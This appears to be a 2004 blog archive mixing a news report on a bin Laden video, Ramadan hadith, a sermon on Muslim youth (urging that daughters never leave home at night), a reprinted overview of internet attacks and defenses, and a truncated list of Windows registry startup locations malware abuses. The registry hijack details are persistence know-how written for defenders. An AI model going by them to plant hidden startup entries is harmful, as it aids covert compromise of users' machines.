Sunday, October 31, 2004

Who wants some dishoom?

"Sorry for the music, but it's very funny."

Osama Bin Laden Warns America

Osama bin Laden, injecting himself into the campaign four days ahead of presidential elections, said in a videotape aired Friday that the United States can avoid another Sept. 11 attack if it stops threatening the security of Muslims.

In the segment broadcast, the al Qaeda leader refrained from directly threatening new attacks, although he said "there are still reasons to repeat what happened."

"Your security is not in the hands of (Democratic presidential nominee John) Kerry, (U.S. President George W.) Bush or al Qaeda. Your security is in your own hands," bin Laden said. "Any state that does not mess with our security, has naturally guaranteed its own security."

Admitting for the first time that he ordered the Sept. 11 attacks, bin Laden said he did so because of injustices against the Lebanese and Palestinians by Israel and the United States.

Bin Laden said he wanted to explain why he ordered the suicide airline hijackings that hit the World Trade Center and the Pentagon so Americans would know how to act to prevent another attack.

"To the American people, my talk is to you about the best way to avoid another Manhattan," he said. "I tell you: Security is an important element of human life and free people do not give up their security."

It was the first footage in more than a year of the fugitive al Qaeda leader, thought to be hiding in the mountains along the Pakistan-Afghanistan border. The video, broadcast on Al-Jazeera television, showed bin Laden with a long gray beard, wearing traditional white robes, a turban and a golden cloak, standing behind a table with papers and in front of a plain, brown curtain.

His hands were steady and he appeared healthy.

The Bush administration said Friday it believes the videotape was authentic and had been made recently. Bush said Friday that "Americans will not be intimidated" by bin Laden.

The U.S. was given a copy of the bin Laden tape several hours before it aired, so intelligence analysts have had time to study it, reports CBS News National Security Correspondent David Martin. Emergency video conferences were set in motion all over Washington to assess what the tape meant and how the U.S. should react to it.

The timing of the tape suggests bin Laden is trying to influence the U.S. election -- much as the Madrid train bombings last March apparently led to the defeat of Spain's pro-U.S. prime minister, Martin reports.

One of the first things that struck analysts about the tape was bin Laden's appearance -- well groomed, well dressed, and warm, reports Martin. It was a far cry from the noticeably haggard man seen on a tape released in December of 2001. That tape spurred speculation bin Laden had been wounded in the bombing of Tora Bora. But this latest tape shows a man gesturing naturally with both hands and giving no obvious sign of disability. It puts to end any debate about whether bin Laden is alive.

A U.S. official in Washington said the entire tape was 18 minutes, lacked an explicit threat and repeated well-worn themes.

Al-Jazeera broadcast about seven minutes of the tape. The station's spokesman, Jihad Ali Ballout, said they aired what was "newsworthy and relevant" and refused to describe the unaired portions, including whether they included any threats.

Al-Jazeera, based in Qatar, did not say how it had received the tape. The channel has previously broadcast audio and video tapes from members of al Qaeda.

There was no way to determine exactly when the tape was made — but it offered evidence that bin Laden was alive and following events. Kerry emerged as the Democratic candidate in the spring.

In Florida, Kerry said all Americans are united against bin Laden, adding he would "stop at absolutely nothing to hunt down, capture or kill the terrorists wherever they are, whatever it takes, period."

Bin Laden accused President Bush of misleading Americans by saying the attack was carried out because al Qaeda "hates freedom." Bin Laden said his followers have left alone countries that do not threaten Muslims.

"We fought you because we are free ... and want to regain freedom for our nation. As you undermine our security we undermine yours," he said.

He said he was first inspired to attack the United States by the 1982 Israeli invasion of Lebanon in which towers and buildings in Beirut were destroyed in the siege of the capital.

"While I was looking at these destroyed towers in Lebanon, it sparked in my mind that the tyrant should be punished with the same and that we should destroy towers in America, so that it tastes what we taste and would be deterred from killing our children and women," he said.

"God knows that it had not occurred to our mind to attack the towers, but after our patience ran out and we saw the injustice and inflexibility of the American-Israeli alliance toward our people in Palestine and Lebanon, this came to my mind," he said.

Bin Laden suggested Bush was slow to react to the Sept. 11 attacks, giving the hijackers more time than they expected. At the time of the attacks, the president was listening to schoolchildren in Florida reading a book, an incident to which bin Laden referred.

"It never occurred to us that the commander-in-chief of the American armed forces would leave 50,000 of his citizens in the two towers to face these horrors alone," he said, referring to the number of people who worked at the World Trade Center.

In planning the attacks, bin Laden said he told Mohammed Atta, one of the hijackers, that the strikes had to be carried out "within 20 minutes before Bush and his administration noticed." Instead, bin Laden said, his operatives had three times that period.

Bin Laden also said the Bush administration was like repressive Arab regimes "in that half of them are ruled by the military and the other half are ruled by the sons of kings and presidents."

Montasser el-Zayat, a Cairo lawyer who defends Islamic radicals, said the video amounted to an "unprecedented attack on Bush at a very critical time, before the U.S. elections," and also served as proof bin Laden was alive and at large.

In elections after March 11 bombings in Spain blamed on al Qaeda, Jose Maria Aznar was defeated. The Spanish bombings came just before the vote, killed 191 people and were seen as revenge for Aznar's support of the Iraq war despite his citizens' opposition. The new Socialist leaders how defeated Aznar withdrew Spain's troops from Iraq after taking office in April.

On Web sites devoted to extremist Muslim comment, contributors reacted with glee to the tape, saying it was proof bin Laden was alive and a "slap" at America.

The image of bin Laden reading a statement was dramatically different from the few other videos of the al Qaeda leader that have emerged since the Sept. 11 attacks.

In the last videotape, issued Sept. 10, 2003, bin Laden is seen walking through rocky terrain with his top deputy Ayman al-Zawahri, both carrying automatic rifles. In a taped message issued at the same time, bin Laden praises the "great damage to the enemy" on Sept. 11 and mentions five hijackers by name.

In December 2001, the Pentagon released a videotape in which bin Laden is shown at a dinner with associates in Afghanistan on Nov. 9, 2001, saying the destruction of the Sept. 11 attacks exceeded even his "optimistic" calculations.

But in none of his previous messages, audio or video, did bin Laden directly state that he ordered the attacks.

The last audiotape purportedly from bin Laden came in April. The speaker on the tape, which CIA analysts said likely was the al Qaeda leader, offered a truce to European nations if they pull troops out of Muslim countries. The tape referred to the March 22 assassination by Israel of Hamas founder Sheik Ahmed Yassin.

Al-Zawahri, bin Laden's Egyptian deputy, has spoken on three recent audiotapes that emerged on June 11, Sept. 9 and Oct. 1 this year. In the latest, he called on young Muslims to strike the United States and its allies.

Fasting in Ramadan; a shield from Hell

Arfajah said "We were with `Utbah Ibn Farqad while he was discussing Ramadan. A companion of the Prophet entered upon the scene. When `Utbah saw him, he became shy and stopped talking. The man (the companion) spoke about Ramadan, saying "I heard the Messenger of Allah say during Ramadan: 'The gates of Hell are closed, the gates of Paradise are opened, and the devils are in chains. An angel calls out : 'O you who intend to do good deeds, have glad tidings. O you who intend to do evil, refrain, until Ramadan is completed.''" (Ahmad and an-Nasa'i)

The Messenger of Allah (p.b.u.h.) said : "When Allah created Paradise and Hell-fire, He sent Jibreel (Gabriel) to Paradise, saying: 'Look at it and at what I have prepared therein for its inhabitants.' The Prophet (p.b.u.h.) said: 'So he came to it and looked at it and at what Allah had prepared therein for its inhabitants.' The Prophet (p.b.u.h.) said: 'So he returned to Him and said: 'By your glory, no one hears of it without entering it.' So He ordered that it be encompassed by forms of hardship, and He said: 'Return to it and look at what I have prepared therein for its inhabitants.'' The Prophet (p.b.u.h.) said: 'So he returned to it and found that it was encompassed by forms of hardship. Then he returned to Him and said: 'By Your glory, I fear that no one will enter it.' He said: 'Go to Hell-fire and look at it and what I have prepared therein for its inhabitants,' and he found that it was in layers, one above the other. Then he returned to Him and said: 'By Your glory, no one who hears of it will enter it.' So He ordered that it be encompassed by lusts (or desires). Then He said: 'Return to it.' And he returned to it and said: 'By Your glory, I am frightened that no one will escape from entering it.''' (at-Tirmithi and al-Hakim among others).

Therefore, when you know, O Dear Brother/Sister, that fasting subdues the desires and reduces their severity, and that it is these desires and lusts that lead to Hell Fire, then you will see how fasting comes between a fasting person and Hell Fire and you will rush to fast in Ramadan and after Ramadan in the best possible way.

The Holy Quran rather talks about the reward of fasting and there are verses which general meaning infers that those who obey Allah will be saved from Hell, and fasting is a form of obeying Allah. We will leave the verses that talk about the reward to the section related to Paradise. However, the Ahadith of our beloved Prophet Mohammad (p.b.u.h.) are clear in this regard:

Abu Sa'eed al-Khudri reported that the Messenger of Allah, said: "No servant fasts on a day in the path of Allah except that Allah removes the Hell Fire seventy years further away from his face." (Bukhari and Muslim)

Abu Sa'eed al-Khudri relates that the Messenger of Allah (p.b.u.h.) said : "Fasting is a shield with which a servant protects himself from the Fire" (Ahmad, Sahih)

`Uthman Ibn Abil-`Aas relates that the Messenger of Allah (p.b.u.h.) said : "Whoever fasts a day in the way of Allah, Allah places between him and the Fire a trench like that between heavens and the earth". (at-Tirmithi and at-Tabarani, Sahih)

Abu Huraira narrated that Allah's Messenger (p.b.u.h.) said : "When the month of Ramadan starts, the gates of the heaven are opened and the gates of Hell are closed and the devils are chained." (Bukhari)

The Messenger of Allah (p.b.u.h.) said : "When it is the first night of Ramadan the evil devils are chained. The gates of Fire are locked- not a single gate is opened, and the gates of Paradise are opened- not a single gate is locked, and a caller calls out: 'O seeker of good come forward, and O seeker of evil withhold, and there are many whom Allah frees from the Fire - and that is every night. (at-Tirmithi, Ibn Majah, and Ibn Khuzaimah: Hasan)

Abu Hurayrah reported that the Prophet (p.b.u.h.) climbed upon the mimbar (pulpit) and said: "Aameen (O Allah grant it), aameen, aameen". So it was said, 'O Messenger of Allah, you climbed upon the mimbar and said: 'aameen, aameen, aameen'? So he said: 'Jibraa'eel, `alaihi assalam, came to me and said, 'Whoever reaches the month of Ramadan and does not have (his sins) forgiven and so enters Fire, then may Allah distance him, say aameen'. So I said 'aameen''". (Ibn Khuzaimah, Ahmad and al-Bayhaqi: Sahih)

Jabir (May Allah be pleased with him) relates that the Messenger of Allah (p.b.u.h.) said: "In every day and every night, during the month of Ramadan, there are people to whom Allah grants freedom from the Fire, and there is for every Muslim a supplication which he can make and will be granted". (al-Bazzaar, Ahmad and Ibn Majah: Sahih)

In the famous Hadith of Mu`ath, I said: "O Messenger of Allah, tell me of an act which will take me into Paradise and keep me away from Hell-Fire. He said: 'You have asked me about a major matter, yet it is easy for him for whom Allah Almighty makes it easy. You should fast in Ramadan.' Then he (the Prophet) said: 'Shall I not show you the gates of goodness? Fasting is a shield.'" (at-Tirmithi)

We pray to Allah to make for us this Ramadan a shield from Hell Fire.

Source: www.ramadan.ws

Friday, October 29, 2004

Drag Racing in Ramadhaan

By Shaykh Afzal Ismail

In the last few days a number of emails have come to us explaining the despicable condition of our Muslim youth in places like Lenasia where an environment of drag racing has become the 'in thing'. With shock and hurt we have decided to write a few words in the hope that Muslims out there would take heed to the Islamic voice and take action to prevent the condition from worsening.

In Ramadhaan when Allah's mercy and forgiveness is descending it is almost unthinkable that Muslim youth are on the streets pompously racing their fancy cars, blowing their sound systems with deafening Satanic music and hanging out with boyfriends and girlfriends.

This is not unique to Lenasia. Many a Muslim community is faced with the problem of youth loitering at shopping malls, restaurants and in the parking lots of Masjids during Taraweeh. How unfortunate that when the words of Allah are being recited Muslims find greater pleasure in other activities!

This is not only a public disturbance to the local community but an open insult to Islam. The implication is that Muslims cannot be tamed by even the most auspicious month of their calendar!

The harms and sin of this need no explanation. What we need to tackle is why this has come about and how do we prevent it.

The Cause

1. Parents

Muslim parents have to accept a major portion of the blame. Parents need to realize that giving cash, cellphones, cars and other material things to their children does not prove their love for them. Many youth and children are not mature enough to understand how to use these things in a responsible manner.

The Prophet Sallallahu Alaihi Wasallam said : "No father can give a better gift to his children than good manners and good character." (Tirmidhi)

Children need parents to give them their love, their advice, their Islamic knowledge and their time. Parents who live through their children's youthful years making money, travelling on business trips and showing little regard for Islamic teachings in their family setup end up having to deal with a terrible mess in the form of disobedient children, drug addiction and divorce in their very own homes.

Islam teaches a long term solution. Parents are to live with their children through their days of happiness and sadness providing support and encouragement. This may bring less income into the family but more happiness, contentment and stability.

2. The Media

The movie and television industry has brainwashed our children's minds from a tender age into believing that lights, jingles, fancy cars, music, dating and dressing to kill brings happiness. The opening ceremonies of sporting events, the Oscars, actor's profiles, etc all have the stench of breeding arrogance and extravagance in their followers. This arrogance coupled with all the other negative qualities which are beamed out from the movies rub off onto the youth.


The Solution

Quick Solution

Parents need to keep a tight check on their children's movements.
Children should accompany their parents to Taraweeh and measures should be taken in every Masjid that children do not slip out during Taraweeh.
Daughters should never be allowed to leave their homes at night.
Muslim owned restaurants need to be closed during Taraweeh. No Muslim in his right state of mind can enjoy the extra profits earned during Taraweeh from Muslim customers who want to escape from the beautiful environment of the Masjid.
Long Term Solution

Parents should develop their spirituality to the level that this spirituality rubs off onto their children and family. Parents whose lives revolve around Salaah, recitation of Quran, Da'wah, community work and good morals bring up children who are mature and responsible. Parents who are spiritually weak and show little concern for Islamic teachings bring up children who are gangsters and recluses. This is a general reality which we can relate to in our own experiences.

Youth need to be convinced that the fast life of moving with fancy cars, loud music, funky dress, cell phones, etc do not prove that one is good or successful. American and Western youth have tasted of this life and it has destroyed them completely. Why should Muslim youth want to follow in their footsteps? Islam teaches that successful are those youth who are attached to the Masjid and whose lives are adorned with good character.

Each and every Muslim who has the concern of Muslim youth at heart should make dua to Allah to eradicate our communities of such behaviour. May Allah bring peace, goodness and morality into our homes and communities. Aameen!
Convert this email into action

1. Print copies of this article and give them to your children to spread them in school and Madrasah

2. Print and read at the Iftaar table in your home

3. Print and ask school and Madrasah teachers to read to their students

4. Print and leave them in public places, shops, etc

5. Forward this article to all on your mailing list

6. Forward your ideas and suggestions to info@muslimsatwork.co.za on the problem and how to overcome it.




General Attack Descriptions

By security-protocols.com

Article pulled from Security-Protocols


Until a few years ago Internet security wasn't even recognized as a need.
The culture of the Internet encouraged the sharing of data and ideas; the
common goals of Internet users made boundaries and restrictions
unnecessary--or so it seemed to many at the time.

Originally, the people on the Internet were the people who built the
Internet, but as time passed and the Internet became more useful and more
reliable, they were joined by other people at their companies and
universities--and then by other companies and universities. With fewer
common goals and more people, the Internet became a much more dangerous
place. Although various sorts of mischief were quite common, these incidents
got little publicity, and most people who thought of computer security
problems at all assumed that such problems involved teenagers breaking into
banks with modems.

The Internet Worm changed all that. In November of 1988 the Internet linked
about 60,000 computers, and a good many of them found themselves under
attack. Even those not affected by the Worm still had to be checked and
rechecked to be sure they were safe from infection. Estimates of the total
price tag for the incident are in the hundreds of millions of dollars.

The Worm was the first Internet security incident to hit the nightly news.
People who had been working in obscurity suddenly found TV camera crews in
their machine rooms. The issue was no longer whether you needed to secure
your computer systems--it was how you were going to secure them.

In the years since the Worm, there has been an explosion in Internet
usage--and a corresponding explosion in new types of Internet attacks.
Consider a few recent reports from the front:

* Over the years, computational physicist and computer security
researcher Tsutomu Shimomura of the San Diego Supercomputer Center has
accumulated an invaluable archive of security tools and documentation
of system security holes. On Christmas Day 1994 an intruder copied the
files from his archive. Two days later Shimomura received a voice mail
message, bragging about the intrusion and threatening his life.
Shimomura reacted aggressively by setting up stealth monitoring posts
and tracking the intruder's further break-ins at telephone company
switching centers, companies like Apple and Motorola, the Well, and
Netcom (from which the intruder copied 20,000 credit card account
numbers). Shimomura concluded that the intruder was computer criminal
Kevin Mitnick, who had been sought for years by law enforcement. After
an intensive hunt conducted with the cooperation of the FBI and local
telephone companies, Mitnick was tracked down in Raleigh, North
Carolina.

* In the fall of 1994 two writers, Josh Quittner and Michelle Slatalla,
were the target of an "electronic mail bomb", apparently in retaliation
for an article on the cracker community they'd published in Wired
magazine. Someone broke into IBM, Sprint, and the writers' network
provider and modified programs so their email and telephone service was
disrupted. A flood of email messages so overwhelmed their network
service that other messages couldn't get through; eventually their
Internet connection was shut down entirely. Their phone service also
fell victim to the intruders, who reprogrammed things so that callers
were routed to an out-of-state number where they heard an obscene
recording.

* More and more sites are falling victim to password sniffers. The CERT
(Computer Emergency Response Team) reports that as many as 100,000
sites were targeted by password sniffers in 1994. (We'll explain what
sniffers do later in this article.)

Insidious attacks like these have made computer security one of the most
pressing problems facing Internet users in this decade. O'Reilly &
Associates' line of computer security books looks closely at the risks of
using the Internet and the measures you can take to reduce these risks.

Internet Risks

What kinds of security risks do you take on the Internet? Here's a sampling:

Password Attacks

Some years ago, before the Worm raised our consciousness about security
risks, it was almost laughably easy for intruders to break into almost any
system. Many sites didn't use passwords at all, or offered guest or admin
passwords that users could share. Users who did have their own passwords
routinely chose passwords that could be easily guessed (the names of their
children or pets, their birth dates, their license plates). Because nobody
bothered to encrypt files, an intruder who broke into the system could then
invade almost anybody's files, take a copy of the /etc/passwd file, and
later run it through a password cracking program that quickly revealed the
passwords of other users in the system. Once deciphered, these purloined
passwords became bartering chips among underground groups that shared
technical information about product vulnerabilities and site-specific
security holes.

Most systems and users have tightened up their security in the wake of the
Internet Worm. Guest and admin passwords have become rarer, but password
security as a whole is still laughable in most places. Group accounts
abound, and invariably at least 10 percent of the passwords users select are
poor (the only way to make them better is to install a password program that
forces good passwords). Readily available password dictionaries, cracking
programs, and password sniffing combine to make passwords very vulnerable.

How can you avoid password attacks? Educate the users on your system so they
pick better passwords. Consider using system-generated passwords or, better
still, stronger types of authentication, such as one-time (nonreusable)
passwords.

Password Sniffing Attacks

The recent wave of password sniffing attacks on the Internet makes the
strength of your passwords almost irrelevant.

How does password sniffing work? In many network setups, it is possible for
any machine on a given network to hear the traffic for every machine on that
network. This is true for most Ethernet-based networks, and Ethernet is by
far the most common local area networking technology in use today. This
characteristic of Ethernet is especially dangerous because most of the
protocols in use today are unencrypted. As a result, the data sent and
received is there for anybody to snoop on. This data includes files accessed
via network file systems, passwords sent to remote systems during Telnet,
FTP, and rlogin sessions, electronic mail sent and received, and so on.

A password sniffer is a program that takes advantage of this characteristic
to monitor all of the IP (Internet Protocol) traffic on its part of the
network. By capturing the first 128 bytes of every FTP or Telnet session,
for example, password sniffers can easily pick up your user name and
password as you type them. Password sniffers may use programs provided for
network debugging as building blocks, or may be written to use the services
directly. Special-purpose password sniffing toolkits are widely available to
attackers.

The danger of password sniffing attacks is in their rapid spread. Favorite
targets for sniffers are network providers and public access systems where
the volume of Telnet and FTP connections is huge. One sniffer on large
public access systems can collect thousands of sniffed account names and
passwords, and then compromise every system accessed. Even if your systems
are as secure as possible and your user passwords are not guessable, you can
be infected by a packet sniffer running at any site that your users can log
in from, or at any site their packets will cross to get to you.

Password sniffing can happen anywhere. Many people make the mistake of
assuming that because they're using a well-known, commercial service, there
is no danger in remotely accessing their own machines across the network. In
fact, the commercial services are prime targets, and most of them are
periodically compromised. In any case, a connection may cross a large number
of intermediate networks, which each represent unknown risks. How can you
avoid being sniffed? In general, you can't and still provide remote network
access. If your password ever passes across a network which might be
insecure--electronically or physically--it is likely to be captured. What
you can do is ensure that an intruder who gets your password can't use it.
One-time (nonreusable) passwords are probably the most effective way. Using
a freely available program like Bellcore's S/Key may not keep your passwords
from being viewed, but because these passwords are used only once, it
doesn't really matter if they are seen.

NFS and Other Data Service Attacks

A number of services exist to allow computers to share information with each
other and to allow users to move easily from computer to computer. These
services are an important part of the power of UNIX networks. Unfortunately,
they are often exploited by attackers, who convince these services to share
more information than intended or to share it with unintended recipients.
Often this occurs because designers were concerned with local area network
access and did not realize that services might also be available across wide
area networks to other organizations.

The Network File System (NFS) and Network Information Service (NIS) are
notoriously easy ways to attack a system. NFS allows systems to share files
over a network by letting a client mount a disk on a remote server machine.
NIS maintains a distributed database of password tables, group files, host
tables, and other information that systems on a network can share. Many
sites choose not to support NIS at all, and some avoid even NFS. However,
these services are not a problem if they are run in a protected environment
(for example, behind a fire wall).

If you haven't properly protected your site, an attacker may be able to
simply NFS-mount your filesystems. The way NFS works, client machines are
allowed to read and change files stored on the server without having to log
into the server or enter a password.

Because NFS doesn't log transactions, you might not even know that someone
has full access to your files.

NIS is most often used to distribute password information, and most
implementations of NIS provide absolutely no control over which machines can
request information. As long as an attacker can guess the name of your NIS
domain and can send an NIS request to your NIS server, that attacker can get
a full copy of your password information (including encrypted passwords),
even if you are running shadow passwords and the passwords are not in the
/etc/passwd file. The attacker is then free to crack your passwords at
leisure.

NFS, NIS, and other services have additional security vulnerabilities, both
obvious and not so obvious. For example, NFS has very weak client
authentication, and an attacker may be able to convince the NFS server that
a request is coming from a client that is permitted in the exports file (the
file that lets you specify which file systems can be mounted via NFS, and
which other machines can mount them). There are also situations in which an
attacker can hijack an existing NFS mount. (See the discussion of hijacking
attacks later in this article.)

Denial of Service Attacks

There are two classic types of denial of service attacks, both particularly
devastating when used on a network. Earlier in this article, we described an
"electronic mail bomb" that shut down service by flooding an email mailbox.
That's one type of denial of service--the same type performed by the
Internet Worm. What happens here is that an intruder so floods a system or
network--with messages, processes, or network requests--that no work can be
done. The system or network spends all its time responding to messages and
requests, and canUt actually satisfy any of them.

In the other category of attack, equipment or services are completely shut
down or disabled. With ICMP attacks, which are becoming more common on the
Internet, an attacker sends an ICMP message to a host or router, telling it
to stop sending packets to all or part of the network.

How can you prevent denial of service attacks? The best defense against an
ICMP attack is to install a firewall that ignores or filters ICMP messages.

In general, though, denial of service attackers are tough to
prevent--electronically, as well as in real life. If you accept things from
the external world--electronic mail, telephone calls, or packages--it's
possible to get flooded. The famous college prank of ordering a pizza or two
from every pizzeria in town to be delivered to your least favorite person is
a form of denial of service. (It's hard to do much while arguing with 42
pizza deliverers.) In the electronic world, denial of service is as likely
to happen by accident as on purpose. (Have you ever had a persistent fax
machine try to fax something to your voice line?) The most important thing
is to set up services so that if one of them is flooded, the rest of your
site keeps functioning while you fix the problem.

Fortunately, denial of service attacks are not terribly popular. They're
easy enough to be unsporting; they tend to be simple to trace back--and
therefore risky to the attacker; and they don--t provide the attacker with
the information or the ability to use your computers that is the payoff for
most other attacks. Intentional denial of service attacks are the work of
people who are angry at your site in particular--and at most sites, there
are very few such people.

IP Attacks

Attackers sometimes take advantage of a little-used option--the source
routing option--in the IP header of packets being sent across the Internet.
Even systems protected by firewalls have fallen victim to these types of
attacks.

Certain kinds of firewalls work by keeping packets from being routed from an
outside system into your internal network. In normal packet routing, packets
are routed in the most efficient way from source to destination. However, if
the source routing option is specified for a packet, it shows the particular
route that the packet is to follow. Unfortunately, turning off the regular
routing of packets from the Internet to an inside network doesn't turn off
the routing of source-routed packets on BSD systems. At tackers have
exploited this peculiarity and used it to penetrate systems that are
expecting their firewalls to keep all such outside packets out.

Another attack, which surfaced for the first time in early 1995, involves
attackers creating packets with false IP addresses. By exploiting
applications that use authentication based on IP addresses (such as the
so-called Berkeley RrS commands, which include rlogin, rsh, and rcp),
intruders have been able to gain access. Most of the attacks take advantage
of the ability of intruders to guess sequence numbers associated with
network connections and the acknowledgments passed between machines. These
attacks are technically tricky, because the intruder doesn't receive the
responses to the packets it sends; when they succeed, however, the payoff
for these attacks can be high. (The attack on Shimomura described earlier
was this type.)

How can you prevent these attacks? Firewalls are the only sufficient
defense. You want to look for packets on your external interface (that is,
packets coming from outside your internal network) that claim to have
internal source IP addresses and for packets that have source routes
specified. You can do this by installing an appropriately configured packet
filtering router. It's also best to avoid address-based authentication
completely, if you can.

Hijacking Attacks

Another emerging Internet threat involves the hijacking of any open terminal
or login session from users on the system. Once intruders have root access
on a system, they use a tool that lets them dynamically modify the UNIX
kernel. This allows them to take over terminal connections after any
authentication procedures have been completed. Even the strongest
authentication (e.g., one-time passwords) are irrelevant because the attack
occurs after the user successfully logs in. (This is another way that your
systems can be compromised from any system that your users can log in from.)

This sort of attack has always been possible, but is easier to do and harder
to detect with the new tools. Various forms of hijacking--from the
completely unsubtle method of waiting for someone to get up for a cup of
coffee without locking their screen, to the devious exploitation of window
systems--have long been the most popular attacks at universities and other
places where people may legitimately have access and yet simultaneously be
hackers. In the past, these attacks have mostly been aimed at users at the
site where the attacks were taking place. The new attacks are aimed at
getting from a compromised system to an otherwise uncompromisable system
across the Internet.

How can you prevent this attack? Once intruders have root access, you can't.
So keep them out to begin with.

Security Solutions

Getting discouraged about connecting to the Internet or doing any real work
on it? Don't be. There are ways to protect your system against the threats
we've described.

There isn't a magic Internet security bullet. The best security solution
isn't a simple solution, but a collection of strategies and techniques. Your
own site's security philosophy, the characteristics of your users, the type
of data you're protecting, and your budget all help determine the right
approach for you. Here are some suggestions.

Enforce Good Host Security

With host security, you enforce the security of every machine at your site
separately, and you make every effort to learn about, and plug, any security
holes that your particular operating system presents. Although host security
isn't a complete solution to Internet risks--there are simply too many
machines, vendors, and operating systems to be sure that you've successfully
been able to secure them all--you need to make sure that every system on
your local network is as secure as you can make it. Systems exposed directly
to Internet traffic need especially strong host security.

In Practical UNIX Security, Simson Garfinkel and Gene Spafford offer
hundreds of specific suggestions for host security and also discuss a wide
range of network security problems and solutions. This book has become the
classic security reference for UNIX users and system administrators.

Encryption of Files and Email

If you use good encryption, then even if an intruder gets access to your
files and messages, he won't be able to make sense of them. There are many
types of encryption programs. Make sure to use one that uses a strong
cryptographic algorithm. Although it's been around a long time, the Data
Encryption Standard (DES) is still a pretty sound private key encryption
algorithm, particularly if you use a variant, like Triple-DES. IDEA, RC2,
and RC4 are other good private key algorithms. The RSA algorithm is the
premier public key algorithm. It's a part of Lotus Notes, Novell NetWare,
and hundreds of other products. Diffie-Hellman and Merkle-Hellman are other
good public key algorithms.

PGP is a program that implements the RSA algorithm and is freely available
on the Net (for noncommercial use within the United States). In PGP: Pretty
Good Privacy, Simson Garfinkel describes how to use PGP to encrypt files and
email and how to "sign" your email with an unforgettable digital signature,
proving to recipients that your messages were sent by you and weren't
modified during transmission. The book also contains a fascinating,
behind-the-scenes look at the development of Phil Zimmermann's controversial
program and the issues surrounding privacy, the export of encryption
programs, and cryptography patents.

Use Firewalls

A firewall restricts access from your internal network to the Internet--and
vice versa. A firewall may also be used to separate two or more parts of
your local network (for example, protecting finance from R&D).

The dictionary definition of "firewall" is: "A fireproof wall used as a
barrier to prevent the spread of a fire." A fire may damage, or even
destroy, one section of a building, but a firewall may keep that fire from
spreading to other sections of the building; at the very least, it may slow
down the spread until the fire can be brought under control.

On computer networks, firewalls serve an analogous purpose. A security
problem somewhere on a network--for example, eavesdropping, a major
break-in, or a worm program--may do a great deal of damage to one portion of
the network. But if a fire wall is in place, it can isolate what's behind it
from the security problem. Without firewalls network security problems can
rage out of control, dragging more and more systems down. Once one system on
a network has been compromised, it's often trivial to compromise the others.
Shared system resources, homogeneous services, and trust policies may all
contribute to the spread of a security problem from one system to another.

Think of a firewall as a checkpoint; all traffic is stopped and checked at
this point--usually, at the perimeter of your internal network, where you
connect to the Internet (see the figure above). Your own site's security
policy determines what happens at the checkpoint. Some requests (e.g.,
requests for email service) might pass right through. Others (e.g., requests
for potentially dangerous service like NFS or NIS) might be turned away.
Still others (e.g., requests for FTP file transfers) might be routed to
proxy services, which satisfy the requests without directly exposing
internal systems.

If your site is connected to the Internet, you may want to check out our
forthcoming book, Internet Security Firewalls, by D. Brent Chapman and
Elizabeth D. Zwicky. It contains the details of various firewall approaches
and architectures, how you can build packet filtering and proxying solutions
at your site, and how to configure Internet services to work with a
firewall.

Use Secure Procedures

Purely technical solutions go only so far. Just as there is a human element
to committing computer crimes, there is a human element to preventing them.
Be smart about prevention, and make sure your organization enforces good
security procedures in everything they do. Physical security (e.g., using
access cards for entry, protecting network cabling, etc.), personnel
security (e.g., removing the accounts of people who leave your
organization), and operational security (e.g., varying the schedules for
changing passwords, checking log files, etc.) are less technical, but
nevertheless important, parts of Internet security.

Two books provide valuable information on understanding and establishing
security at your site.

Computer Security Basics, by Deborah Russell and G. T. Gangemi, is the first
book to read if you want to learn what computer security is all about. It
contains the basics of access control, encryption, trusted systems, and
physical security, as well as a history of computer security developments,
U.S. Government security programs (such as the "Orange Book"), and a
complete glossary and resource summary.

Computer Crime: A Crimefighter s Handbook, by David Icove, Karl Seger, and
William VonStorch, is aimed particularly at those who need to investigate
computer crimes--law enforcement, managers, and others. It describes
targets, criminals, methods, and security measures you can take to prevent
them. It also details the way to detect, investigate, and prosecute computer
crimes, and it includes the complete text of all computer crime laws, both
federal and state.

president of SAGE (the System Administrator's Guild). She has been
involuntarily involved in Internet security since before the Worm.

Places that viruses and trojans hide on start up

By ShaolinTiger

The following article was written by ShaolinTiger, Administrator of: http://www.security-forums.com/

1. START-UP FOLDER.

Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu.

Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference.

Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.

For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)

2. REGISTRY.

Windows executes all instructions in the "Run" section of the Windows Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.

3. REGISTRY.

Windows executes all instructions in the "RunServices" section of the Registry.

4. REGISTRY.

Windows executes all instructions in the "RunOnce" part of the Registry.

5. REGISTRY.

Windows executes instructions in the "RunServicesOnce" section of the Registry. (Windows uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.)

6. REGISTRY.

Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* section of the Registry. Any command imbedded here will open when any exe file is executed.

Other possibles:

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\"
%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\"
%*"

If keys don't have the "\"%1\" %*" value as shown, and are changed to something like "\"somefilename.exe %1\" %*" than they are automatically invoking the specified file.

7. BATCH FILE.

